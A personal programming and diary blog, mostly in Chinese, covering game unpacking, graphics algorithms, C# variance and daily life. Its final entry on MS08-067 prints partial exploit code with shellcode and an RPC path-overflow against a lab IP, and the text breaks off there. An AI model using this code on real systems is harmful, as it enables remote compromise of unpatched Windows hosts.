|
|
October 23 脱upx官方壳(作者只是为了压缩),bp CreateFileA,很顺利地摸到了解压函数thmj.exe.0x00419f16,之前在内存分配算法里转了很久。这里是内存dump出来的第一个文件:
--[[ prototype boot.lua
これはAIMSで新規にゲームを作成する際の
プロトタイプとなるファイルです。
適当に書き換えてご利用ください。 ]] -------------------------------------------
-- common呼び出し
------------------------------------------- -- AIMSのファイルは全てprequire関数で読み込んでください。
-- ビルトインのrequireも使えますが、
-- requireではパッケージファイルの中をスキャンしてくれません。
prequire("common.lua"); -------------------------------------------
-- 定数初期化
------------------------------------------- G = {}; -- グラフィックハンドルはこの下にぶら下げる
S = {}; -- サウンドハンドルはこの下に略
A = {}; -- 全体から扱いたいアクターのハンドルはこの下に -- こうやってテーブルの下に分けておくと色々楽です -------------------------------------------
-- 共有関数呼び出し
-------------------------------------------
--ゲーム中で共有する関数をprequireします。
prequire("s/game_common.lua");
prequire("s/save.lua");
prequire("s/trans.lua");
prequire("s/socket.lua"); prequire("s/serial.lua"); prequire("s/c_fader.lua"); -------------------------------------------
-- ゲームシーン呼び出し
-------------------------------------------
--ゲームのシーンスクリプトをprequireします。
prequire("s/scene/mouse.lua");
prequire("s/scene/logo.lua");
prequire("s/scene/title.lua");
prequire("s/scene/demonstration.lua");
prequire("s/scene/infomation.lua");
prequire("s/scene/chrselect.lua");
prequire("s/scene/storyselect.lua");
prequire("s/scene/multi.lua");
prequire("s/scene/game.lua");
prequire("s/scene/option.lua");
prequire("s/scene/dialog_serial.lua");
prequire("s/scene/quit.lua");
prequire("s/scene/standby.lua");
prequire("s/scene/replay.lua");
prequire("s/scene/adv.lua");
prequire("s/scene/ending.lua");
prequire("s/scene/gameover.lua"); -- addScene対象
prequire("s/scene/telop.lua");
prequire("s/scene/network.lua");
prequire("s/scene/submenus.lua"); --デバッグモードでしか使わないシーン
if(_DEBUG)then
prequire("s/scene/testfield.lua");
_GO_TO_TESTFIELD = false;
end prequire("s/stats/character.lua");
prequire("s/stats/taku.lua");
prequire("s/stats/achievement.lua"); -- プレイヤーの動作関数
prequire("s/actor/player/ui.lua");
prequire("s/actor/player/IsFuroPlayer.lua");
prequire("s/actor/player/OnChiPlayer.lua");
prequire("s/actor/player/OnAnkanPlayer.lua");
prequire("s/actor/player/OnSutehaiPlayer.lua"); prequire("s/actor/cpu/IsFuroCpu.lua");
prequire("s/actor/cpu/OnChiCpu.lua");
prequire("s/actor/cpu/OnSutehaiCpu.lua"); prequire("s/actor/Network/IsFuroNetwork.lua");
prequire("s/actor/Network/OnSutehaiNetwork.lua"); --ゲームメインでの行動スレッド用スクリプト
prequire("s/algorithm/OnAgari.lua");
prequire("s/algorithm/OnAnkan.lua");
prequire("s/algorithm/OnChi.lua");
prequire("s/algorithm/OnKyusyu.lua");
prequire("s/algorithm/OnMinkan.lua");
prequire("s/algorithm/OnPon.lua");
prequire("s/algorithm/OnRon.lua");
prequire("s/algorithm/OnSutehai.lua");
prequire("s/algorithm/OnTsumo.lua"); --ゲーム中の関数なんか用
prequire("s/algorithm/hai_code.lua");
prequire("s/algorithm/bonus_pts.lua");
prequire("s/algorithm/isAnkan.lua");
prequire("s/algorithm/isChi.lua");
prequire("s/algorithm/isMinkan.lua");
prequire("s/algorithm/isPon.lua");
prequire("s/algorithm/isReach.lua");
prequire("s/algorithm/isRon.lua");
prequire("s/algorithm/isYakuhai.lua");
prequire("s/algorithm/isFuro.lua"); prequire("s/algorithm/ShowAgariResult.lua");
prequire("s/algorithm/ShowKyokuResult.lua");
prequire("s/algorithm/ShowEndGameResult.lua"); -- アクタークラススクリプト
prequire("s/actor/hai.lua");
prequire("s/actor/taku.lua");
prequire("s/actor/player.lua");
prequire("s/actor/titles.lua");
prequire("s/actor/effect.lua");
prequire("s/actor/button.lua");
prequire("s/actor/taku_entity/scoreboard.lua");
prequire("s/actor/taku_entity/nameboard.lua");
prequire("s/actor/taku_entity/result_nameboard.lua");
prequire("s/actor/taku_entity/global_status.lua"); -- サウンド関連
prequire("s/se.lua");
prequire("s/music.lua"); -------------------------------------------
-- OnLoad 起動直後に呼ばれる
-------------------------------------------
function OnLoad()
os.setlocale("English_America.932", "time");
--_dm("os.setlocale;"..tostring( os.setlocale("English_America.932", "time") ) );
--_dm( "now:"..os.date( "!%a, %d %b %Y %H:%M:%S GMT", 1235706461) );
setWindowCaption("東方幻想麻雀 - Touhou Unreal Mahjong Ver "..GAME_VER);
G.__spinnerbase = loadGraphic("gfx/spinner.png");
G.spinner = {};
G.spinner[1] = {};
for i=0,12 do
G.spinner[1][i+1] = cutGraphic(G.__spinnerbase,0,32*i,192,32);
end
setAllGraphicCenter(G.spinner[1],1,1); G.spinner[2] = cutGraphic(G.__spinnerbase,0,418,192,32); setGraphicAnimeLoop(G.spinner[1],4,1); end -------------------------------------------
-- OnStart
------------------------------------------- -- 起動直後はbootシーンが呼ばれます。
function boot_OnStart()
cls();
clearLayerSettings();
-- SE初期化してみる
se_init();
if(getgv(1,0)==0)then
--初回起動らしい。
setgv(1,0,1);
setgv(1,1,3);
setgv(1,2,5);
setgv(1,3,0);
end
-- キャラクターアンロック
setgv(1, 101, 1);
setgv(1, 102, 1);
setgv(1, 110, 1);
setgv(1, 113, 1);
setgv(1, 120, 1);
setgv(1, 122, 1);
setgv(1, 130, 1);
setgv(1, 132, 1);
setgv(1, 137, 1);
setgv(1, 152, 1);
-- 卓のアンロック
setgv(1, 201, 1);
-- デバッグ用:セーブデータ全アンロック
--_ALL_ARCHIEVEMENT_UNLOCK = true
--for i = 100,399 do
-- setgv(1, i, 1);
--end
setMusicMasterVolume(getgv(1,1)*10);
setSoundMasterVolume(getgv(1,2)*10);
savedata_init();
G.boot = loadGraphic("gfx/title/notice.png");
startThread("boot_thread");
end -------------------------------------------
-- OnStep
-------------------------------------------
function boot_OnStep()
if(not isThreadRunning())then
changeScene("logo");
end
end
-------------------------------------------
-- OnClose
-------------------------------------------
function boot_OnClose()
cls();
end function boot_thread()
if(_DEBUG)then return; end
local a = createActor(G.boot,400,300,0);
addMover(a,-1,1,MOVER_SETCOLOR,0,0,0);
for i=1,16 do
addMover(a,-1,1,MOVER_SETCOLOR,i*16-1,i*16-1,i*16-1);
wait(1);
end
wait(30);
for i=0,60*8 do
if( getJoyPressCount(BUTTON_TRIG1)==1 or
getJoyPressCount(BUTTON_TRIG2)==1 or
getMousePressCount(MOUSE_LEFT)==1 or
getMousePressCount(MOUSE_RIGHT)==1 )then
break;
end
wait(1);
end
-- 音楽の正当性チェック
local result, mtime, md5 = isMusicPackageCheck(SAVEDATA.MUSIC_PACKAGE.MTIME, SAVEDATA.MUSIC_PACKAGE.MD5)
if(result)then
SAVEDATA.MUSIC_PACKAGE = {
MTIME = mtime;
MD5 = md5;
};
else
error("エラー:パッケージファイルが壊れています。");
end
for i=16,1,-1 do
addMover(a,-1,1,MOVER_SETCOLOR,i*16-1,i*16-1,i*16-1);
wait(1);
end
cls();
wait(30);
deleteGraphic(G.boot);
G.boot=nil;
end -------------------------------------------
-- OnVanish アプリ終了直前に呼ばれる
-------------------------------------------
function OnVanish()
if(Socket ~= nil)then
if(Socket.roomnum ~= nil and not REPLAYMODE)then
b_HTTPLOCK = false;
if(bNetwork)then
-- TODO:停止END時にペナルティをなかったことにする
if(os.time() - LATEST_TASKTIME > 60 and SAVEDATA.PERSONALDATA[SAVEDATA.PENALTY_MODE] ~= nil)then
if(SAVEDATA.PENALTY_BSCORE==0)then
SAVEDATA.PERSONALDATA[SAVEDATA.PENALTY_MODE].totalgames_n =
SAVEDATA.PERSONALDATA[SAVEDATA.PENALTY_MODE].totalgames_n -1;
else
SAVEDATA.PERSONALDATA[SAVEDATA.PENALTY_MODE].totalgames_b =
SAVEDATA.PERSONALDATA[SAVEDATA.PENALTY_MODE].totalgames_b -1;
end
SAVEDATA.PENALTY_SCORE = 0;
SAVEDATA.PENALTY_PLACE = 0;
SAVEDATA.PENALTY_MODE = "";
SAVEDATA.PENALTY_BSCORE = 0;
save_state();
end
-- 対局から抜ける
local taskdata = {
seat = tonumber(GLOBAL_VIEW_POINT);
task = "OnLeave";
hash = md5string(SAVEDATA.PIN);
}
local send = {
roomnum = Socket.roomnum;
snum = Socket.snum;
pass = Socket.roompassword;
q = string.gsub(serialize(taskdata), "\n", "");
}
result = POSTSend(send, Socket.script.sendtask);
else
-- 部屋から抜ける
local send = {
roomnum = Socket.roomnum;
pass = Socket.roompassword;
hash = "\""..md5string(SAVEDATA.PIN).."\"";
};
result = POSTSend(send, Socket.script.leave);
end end
Socket:delete();
Socket = nil;
end printnode(TASK);
deleteAllGraphic(G); -- グラフィック削除
deleteAllSound(S); -- サウンド削除
end September 25 Variance An aspect of generics that often comes across as surprising is that the following is illegal: IList<string> strings = new List<string>(); IList<object> objects = strings; The second assignment is disallowed because strings does not have the same element type as objects. There is a perfectly good reason for this. If it were allowed you could write: objects[0] = 5; string s = strings[0]; Allowing an int to be inserted into a list of strings and subsequently extracted as a string. This would be a breach of type safety. However, there are certain interfaces where the above cannot occur, notably where there is no way to insert an object into the collection. Such an interface is IEnumerable<T>. If instead you say: IEnumerable<object> objects = strings; There is no way we can put the wrong kind of thing into strings through objects, because objects doesn’t have a method that takes an element in. Variance is about allowing assignments such as this in cases where it is safe. The result is that a lot of situations that were previously surprising now just work. Covariance In .NET 4.0 the IEnumerable<T> interface will be declared in the following way: public interface IEnumerable<out T> : IEnumerable { IEnumerator<T> GetEnumerator(); } public interface IEnumerator<out T> : IEnumerator { bool MoveNext(); T Current { get; } } The “out” in these declarations signifies that the T can only occur in output position in the interface – the compiler will complain otherwise. In return for this restriction, the interface becomes “covariant” in T, which means that an IEnumerable<A> is considered an IEnumerable<B> if A has a reference conversion to B. As a result, any sequence of strings is also e.g. a sequence of objects. This is useful e.g. in many LINQ methods. Using the declarations above: var result = strings.Union(objects); // succeeds with an IEnumerable<object> This would previously have been disallowed, and you would have had to to some cumbersome wrapping to get the two sequences to have the same element type. Contravariance Type parameters can also have an “in” modifier, restricting them to occur only in input positions. An example is IComparer<T>: public interface IComparer<in T> { public int Compare(T left, T right); } The somewhat baffling result is that an IComparer<object> can in fact be considered an IComparer<string>! It makes sense when you think about it: If a comparer can compare any two objects, it can certainly also compare two strings. This property is referred to as contravariance. A generic type can have both in and out modifiers on its type parameters, as is the case with the Func<…> delegate types: public delegate TResult Func<in TArg, out TResult>(TArg arg); Obviously the argument only ever comes in, and the result only ever comes out. Therefore a Func<object,string> can in fact be used as a Func<string,object>. Limitations Variant type parameters can only be declared on interfaces and delegate types, due to a restriction in the CLR. Variance only applies when there is a reference conversion between the type arguments. For instance, an IEnumerable<int> is not an IEnumerable<object> because the conversion from int to object is a boxing conversion, not a reference conversion. Also please note that the CTP does not contain the new versions of the .NET types mentioned above. In order to experiment with variance you have to declare your own variant interfaces and delegate types. September 09 以下代码摘自本人最自豪的游戏《3D连连看》:
PS:如果没有记错的,这段代码是手抄《Direct3D中实现图元的鼠标拾取》中的代码,核心应该是被我选择性忽略了… GLfloat LLKan::IntersectTriangle(GLfloat x,GLfloat y,GLfloat z,GLfloat wx,GLfloat wy,GLfloat wz,const SHAPE & triangle,const VECTOR position) {
首先是参数说明:前3个浮点数是射线的近截面交点,后3个浮点数是射线的远截面交点,结构SHAPE应该是存储了三角形在自身坐标系的3个vertex,最后的vector是它的世界坐标系坐标。
GLfloat edge1[3];
GLfloat edge2[3]; edge1[0]=triangle.m_pVertexArray[1].position.x-triangle.m_pVertexArray[0].position.x;
edge1[1]=triangle.m_pVertexArray[1].position.y-triangle.m_pVertexArray[0].position.y;
edge1[2]=triangle.m_pVertexArray[1].position.z-triangle.m_pVertexArray[0].position.z; edge2[0]=triangle.m_pVertexArray[2].position.x-triangle.m_pVertexArray[0].position.x;
edge2[1]=triangle.m_pVertexArray[2].position.y-triangle.m_pVertexArray[0].position.y;
edge2[2]=triangle.m_pVertexArray[2].position.z-triangle.m_pVertexArray[0].position.z;
这里的edge1和edge2分别放了向量AB和AC。
补充数学知识:三角形的重心坐标系(Barycentric coordinates)
在三角形ΔABC中,P点可以用ABC三点来表示,即P=sA+qB+rC 且s+q+r=1。因为 s+q+r=1,故有s=1-q-r,由此得P(q,r) = (1-q-r)A+qB+rC,化简得P(q,r) = A–(B-A)q+(C-A)r。
其他中心坐标系性质参照:http://en.wikipedia.org/wiki/Barycentric_coordinates_(mathematics) GLfloat dir[3];
dir[0]=wx-x;
dir[1]=wy-y;
dir[2]=wz-z; GLfloat w = (GLfloat)sqrt((double)pow(dir[0],2.0)+(double)pow(dir[1],2.0)+(double)pow(dir[2],2.0));
dir[0] /= w;
dir[1] /= w;
dir[2] /= w;
写了一大段废话(其实也不废),就是计算射线的direction向量并归一化。 GLfloat pvec[3];
pvec[0]= dir[1]*edge2[2] - dir[2]*edge2[1];
pvec[1]= dir[2]*edge2[0] - dir[0]*edge2[2];
pvec[2]= dir[0]*edge2[1] - dir[1]*edge2[0]; GLfloat det ;
det = edge1[0]*pvec[0]+edge1[1]*pvec[1]+edge1[2]*pvec[2]; GLfloat tvec[3];
if( det > 0 )
{ tvec[0] = x - triangle.m_pVertexArray[0].position.x - position.x;
tvec[1] = y - triangle.m_pVertexArray[0].position.y - position.y;
tvec[2] = z - triangle.m_pVertexArray[0].position.z - position.z; }
else
{ tvec[0] = triangle.m_pVertexArray[0].position.x - x + position.x;
tvec[1] = triangle.m_pVertexArray[0].position.y - y + position.y;
tvec[2] = triangle.m_pVertexArray[0].position.z - z + position.z;
det = -det ; } if ( det < 0.0001f ) return -1.0f;
这里的det,恩,其实全称是determinant,是行列式的值。唔,当然一下子说明不了。
补充数学知识第二弹:Cramer法则核心解法
射线方程:Vposition + t * Vdirection;
如果交点在三角形内,那么根据重心坐标系,肯定满足:(1-u-v)Va + u*Vb + v*Vc
整理得:Vposition + t*Vdirection = (1-u-v)Va + u*Vb + v*Vc
-Vdirection*t + (Vb-Va)*u + (Vc-Va)*v = Vposition – Va
令e1=Vb-Va, e2=Vc-Va, s=Vposition-Va,则根据Cramer法则解方程为:
|t| 1 |det(s,e1,e2)|
|u|=____________ |det(-d,s,e2)|
|v| det(-d,e1,e2) |det(-d,e1,s)|
根据线性代数,det(A,B,C)=|A B C|=-(AxC)·B=-(CxB)·A(根据个鬼)
|t| 1 |(sxe1)·e2|
|u|=_________ |(dxe2)·s|
|v| (dxe2)·e1 |(sxe1)·d|
根据程序,pvec就是(dxe2),tvec就是s,qvec就是(sxe1)
详细参考《Real-time Rendering 2rd》,P578 GLfloat u ;
u = tvec[0]*pvec[0]+ tvec[1]*pvec[1]+ tvec[2]*pvec[2]; if( u < 0.0f || u > det ) return -1.0f; GLfloat qvec[3];
qvec[0]= tvec[1]*edge1[2] - tvec[2]*edge1[1];
qvec[1]= tvec[2]*edge1[0] - tvec[0]*edge1[2];
qvec[2]= tvec[0]*edge1[1] - tvec[1]*edge1[0]; GLfloat v;
v = dir[0]*qvec[0]+dir[1]*qvec[1]+dir[2]*qvec[2];
if( v < 0.0f || u + v > det ) return -1.0f; GLfloat t = edge2[0]*qvec[0]+edge2[1]*qvec[1]+edge2[2]*qvec[2];
GLfloat fInvDet = 1.0f / det;
t *= fInvDet;
u *= fInvDet;
v *= fInvDet; return t;
} September 08 前记:初次在网上找到的讲解居然是转载http://cg.sjtu.edu.cn,我们交大果然nb啊~
一句话原理:
由直线的斜率确定选择在x方向或y方向上每次递增(减)1个单位,另一变量的递增(减)量为0或1,它取决于实际直线与最近光栅网格点的距离,这个距离的最大误差为0.5。
0<=d<=1
当d<0.5:下一个象素应取右光栅点(xi+1,yi)
当d>0.5:下一个象素应取右上光栅点(xi+1,yi+1)
令e=d-0.5,关于d的判别式和初值可简化成:
e的初值e0= -0.5,增量亦为k;
e<0时,取当前象素(xi,yi)的右方象素(xi+1,yi);
e>0时,取当前象素(xi,yi)的右上方象素(xi+1,yi+1);
e=0时,可任取上、下光栅点显示。 上述Bresenham算法在计算直线斜率和误差项时要用到浮点运算和除法,采用整数算术运算和避免除法可以加快算法的速度。
NError=2*Error*∆x 要使第一个八卦的Bresenham算法适用于一般直线,只需对以下2点作出改造:
当直线的斜率|k|>1时,改成y的增量总是1,再用Bresenham误差判别式确定x变量是否需要增加1;
x或y的增量可能是“+1”或“-1”,视直线所在的象限决定。 //Bresenham's integer line resterization algorithm for all quadrnts
//The line end points are (xs,ys) and (xe,ye) assumed not equal. All variables are assumed integer.
//initialize variables
x=xs
y=ys
∆x = abs(xe -xs) //∆x = xe -xs
∆y = abs(ye -ys) //∆y = ye -ys
sx = isign(xe -xs)
sy = isign(ye -ys)
//Swap ∆x and ∆y depending on the slope of the line.
if ∆y>∆x then
Swap(∆x,∆y)
Flag=1
else
Flag=0
end if
//initialize the error term to compensate for a nonezero intercept
NError =2*∆y-∆x
//begin the main loop
for i=1 to ∆x
WritePixel(x, y , value)
if (Nerror>=0) then
if (Flag) then //∆y>∆x,Y=Y+1
x=x+sx
else
y=y+sy
end if // End of Flag
NError = NError –2*∆x
end if // End of Nerror
if (Flag) then //∆y>∆x,X=X+1
y=y+sy
else
x=x+sx
end if
NError = NError +2*∆y
next i
finish 原文地址:
http://cg.sjtu.edu.cn/lecture_site/chap2/mainframe212.htm August 07 早上上班的时候,匆忙间下楼的时候没顺手抄起交通卡,然后让老爸从楼上扔下来的时候摔碎了一起夹住的晾衣架子开始,我的厄运就此开始。中午打dota由于实力不均,我索性玩起炸弹人,不过也许是很久没玩的原因,自爆没爆死过人。虽然是胜利了,但是却打得极其不爽。晚上做版本,老大不走我也不敢走哪,结果拖着拖着就七点半去了。回到家没钥匙,去老妈公司找人却遇到个极其SB的门卫,加上那间SB公司管理极其混乱,找个人都找不到。接着找了叫小饭馆吃饭,菜上上来才发现是湘菜,辣死,光喝汤了。本来计划请初中同学吃宵夜的,怎么说也顺利换了个工作,结果加班的加班,泡妞的泡妞,失踪的失踪,于是作罢。思索着如何打发时间,跑来跑去连个有空调的地方都没有,哦,当然168和上岛咖啡还是有的,再稍微平民一点的KFC啥的影子都没。路上经过一家街客,结果100块票子找回来7张10,1张20,3个1,1个0.5,5个0.1。再走着走着突然就下雨了,幸好带着伞。雨停了,找了家街边摊吃烤肉,结果烤到一半又下雨了,只能和着雨水吃了。最后回到家发现卡巴被封key。 August 06 Substitution Failure Is Not an Error!
#include <iostream>
using namespace std;
void foo(int iNum) {
cout<<"int print( int )"<< endl;
}
template <typename T>
void foo(T tt, typename T::value_type* pvt_dummy = NULL) {
typename _Ty::value_type vt_someval;
cout<<"template < typename _Ty >"<< endl;
}
void main()
{
short siNum = 10;
foo(siNum);
} June 02 偶还是个有故事的人那…
还需要继续整理,修改一些Tag,基本打算整理到2007年7月为止,顺便把校内值得记录得给挪过来。 为什么过了一年才写,因为我想我可以客观地评价一些人一些事。如果说这四年最后悔的,是从大二大作业开始到大三大作业开始这整整一年的自暴自弃。绩点,编程,在时间轴上保持平行,唯一的慰藉是dota的前八吧……什么练习dota,什么ACG,我只是为怕在教室里见到她和他找借口而已,所以我只不过是因为失恋自己毁了自己的读研路或者其他机会的失败者而已,以此为鉴,走好sjtu外的每一步! 
阳光上限是9990,最上排和最下排的西瓜应该换成煤气,不然中路的玉米大炮极容易被破,破一个少1k,即使是满阳光也会瞬间破产。钉子便宜耐用,应该放两排。我35+的时候,水路被破,加上中间层的玉米大炮消耗过大,结果死在40波上。另外,我在水中放了只猫,效果不入风车,可惜风车没看过来,不小心掉了一辆车…水路的6只煤球应该是最强了…打完发现钱10w+了…花园位置不够了,卖掉了些重复的…
 
May 17 今天一大早赶到国泰电影院看《星际迷航》,下午去搞了RP机,然后紧接着就去上新世界日语,回来的时候还淋了一身雨,晚上试了下480的效果,果然很惨,画面变形,字貌似也很难看清楚,不过对街霸影响不大... April 25 总结一下,刚上手的时候第一版卡了一会儿,后来基本上都轻松解决。然后网上看剧情的时候才发现还要拿星星,于是进入二周目。调教兔子那段比较麻烦,还有2-2的云彩我用10fps+变速齿轮256倍等了10多分钟吧。最后公主那段比较囧,跳了三次才跳上去,还是我换成键盘操作的,不过倒是真的看到公主爆炸了…恩,for memory,上图。 
April 22 台版的翻译不错,一晚上干掉了两个半world,其中两处看了攻略Q_Q几个gameplay,带绿光的是不受时间反转影响的,拼图可以利用 April 06 1.系统必备
CeleDial by yonsm
二、特点
- 迅捷易用:无缝集成到拨号界面,使用电话程序中的 T9 屏幕键盘,简单易用;内存占用极少,运行飞快。
- 智能匹配:支持通过姓名、拼音、简拼和电话号码智能查找联系人;支持所有 Unicode 中文汉字拼音。
- 码表定制:内置支持简体拼音、通用拼音、注音符号方式搜索联系人,可以通过外置码表支持其它查询方式。
- 定制命令:用户可定制的快捷菜单,支持自定义命令扩展,可应用于IP电话、视频拨号等其它扩展应用。
- 广泛支持:支持读取内置联系人、SIM 卡联系人和通话记录电话号码作为 CeleDial 联系人条目。
- 完美兼容:支持 Windows Mobile 5.0/6.0/2003 Pocket PC Phone,支持 QVGA、VGA 和正方形屏幕 。
超小的体积,实用的快速拨号功能,如上所示,99代表zy,当然重码很厉害,也可以这样:
不过打那么数字不如直接去联系人里面找呢... April 02 版权物,如有侵犯某人肖像权再说…
 January 17 WOW手机客户端,WOW可不是山口山啊,名字好像是在轮子上的餐馆。简单来说,就是订餐系统手机客户端罢了。原先我的设想是做可离线式富客户端,当然在第一步选择平台上就错误了。现在想起来主要原因在于我那时候还在用那个三星X108,所以选择了J2ME CLDC平台。如今,塞班、Windows Mobile、谷歌Android还有Mac OSX,这些才是真正的操作系统啊。不过,当时的NetBeans对J2ME的支持已经相当完美了,难产的元凶在于数据库,因为当时比较成熟的PointBase Micro正好挂掉,直接导致CLDC平台上没有比较完善的RDBMS。当然,完美主义的我是不屑J2ME原生的RMS的。(其实那个是可以勉为其难做数据backend的。)一直苦于找不到合适的数据解决方案,让我放弃了。其实,事实上让我放弃的理由很多,比如没有联系到外组合作,说到底,手机客户端靠我一个人还是比较吃力的事情。其次就是没有人支持,话说,根本没人关心的项目实施起来的确比较冷。后来也考虑过重拾BabyRMS,就是所谓的RMS的SQL89 Adapter,不过意义实在不大,在稍微浏览了下SQLite的源代码后正式放弃了。至此,所有相关物全部束之高阁。 November 30 缘起应该是大四沈备军课上停摆的网上订餐系统的手持设备用嵌入式数据库,因为种种原因胎死腹中.
这次重拾也一方面因为Pointbase数据库给IBM吞掉导致没什么顺手来支持CLDC.
基本设想是SQLite3的Port,做支持SQL92的RDBMS,base在CLDC的RMS存储系统之上.
扩展是同外部数据库同步,暂时并没有打算做这个feature.
现在的Plan为:
1.通读SQLite源代码,应该2M的代码还是能啃下来的.
2.做可行性分析,再制订下一步计划. November 23 1.QQ的QQ秀合影功能能让你快速定位对方是否加你为好友.
2.MSN->Tools->Privacy->Contact lists可以让你快速定位对方是否加你为好友. 知道了又如何,这些虚拟的好友关系存在与否有什么关系?
4年的单恋,7年的友谊,值多少?
RESET自己,既然自己有能力知道真相,那就不用再自己骗自己了. November 09 首先注意到无论是PPC端还是Java端,飞信的客户端都不需要输入密码,但是能否利用这一点来登陆他人飞信呢?
很奇怪的是QQ和MSN都有Wifi版本而飞信却迟迟没有Wifi版本出现,当然和这个东西刚开发出来,协议也不是非常透明有关,我的意思是除了libfetion以外,其实我觉得libfetion可以用原fetion的GUI做wrapper上去,没仔细研究过也不妄加评论.事实上,我大概查了一下WAP应用,应该是Server端才得到你的手机号码,然后返回一个cookie作为验证子,所以要欺骗手机号基本上就是要欺骗WAP协议了.因此可以看出,飞信设计的时候就没考虑到Wifi,是故意为之呢还是开发人员脑残... 我的第一部手机是索爱T628,没入手多久就被盗,可以忽略.
我的第二部手机是三星X108,SYSOL系统,非智能操作系统,也是我第一个接触到的刷机平台,留下来比较有用的工具就是Downloader刷机软件了.值得一提的是,该操作系统分为两个部分,一个部分貌似是资源可以随便改,还有一个是操作系统核心,可以在空心段刷入铃声然后改内置铃声的偏移从而达到修改短信铃的目的...可惜没有指令集资料没有反汇编引擎,玩这些根本没有生产力,故放弃.
我的第三部手机是多普达P800W,WM5.0系统,暂时没兴趣刷机,ARM处理器,不过仍旧没找到什么反汇编引擎,基于二进制的刷机在我现在看来完全不可信.主要拿来玩玩.NET CF还是不错的.或者现在的我已经厌倦了C这种中级语言了?!
我(爸)的第四部手机是山寨机,MTK6227系统,暂时不想废米买刷机设备,ARM7处理器,应该能找到反汇编器和设计图纸什么的,不过实在对这个东西没有爱,也没精力,故放弃. October 30 Microsoft的公告:
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
首个POC
http://www.milw0rm.com/exploits/6824
Ph4nt0m的利用代码
http://bbs.ph4nt0m.org/
EMM的主要思路就是利用
NetpwNameCompare((wchar_t *)"\x53\x00\x56\x89\x56\x89\x56\x89\x56\x89",(wchar_t *)"\x4D\x00\x56\x89\x56\x89",4,0);
该函数在堆栈内的残像制造0x5C字符
当前MS08-067的缺憾:
1. IPC$通道虽然为默认开启,但是一般被防火墙所屏蔽
2. svchost在XPSP2系统中默认受DEP数据执行保护
比较赞的分析:
http://www.phreedom.org/blog/2008/decompiling-ms08-067/
http://bbs.pediy.com/showthread.php?t=75361
http://hi.baidu.com/aullik5/blog/item/2f00483782bbd8dba3cc2b41.html 附上比较丑陋的MS08067 ver.xiaoxue:
#include <stdio.h>
#include <windows.h> #include "SRVSVC_h.h"
#pragma comment(lib, "rpcrt4") unsigned char ShellCode[] = "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x78\x75\x65\x20\x68\x78\x69\x61\x6F\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"; int main(int argc, char **argv)
{
RPC_STATUS status;
unsigned char * pszStringBinding = NULL; status = RpcStringBindingComposeA(NULL,
(RPC_CSTR)"ncacn_np",
(RPC_CSTR)"192.168.42.128", // net addr
(RPC_CSTR)"\\pipe\\browser", // endpoint
NULL,
&pszStringBinding);
printf_s("RpcStringBindingCompose returned 0x%x\n", status);
printf_s("pszStringBinding = %s\n", pszStringBinding);
if (status) {
return status;
} status = RpcBindingFromStringBindingA(pszStringBinding, &mIDA_interface_v3_0_c_ifspec);
printf_s("RpcBindingFromStringBinding returned 0x%x\n", status);
if (status) {
return status;
} RpcTryExcept {
unsigned char buff[1024];
//WCHAR szBuffer[] = L".\\\\x\\..\\..\\ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKL";
//WCHAR szBuffer[] = L".\\\\x\\..\\..\\ABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJKABCDEFGHIJK";
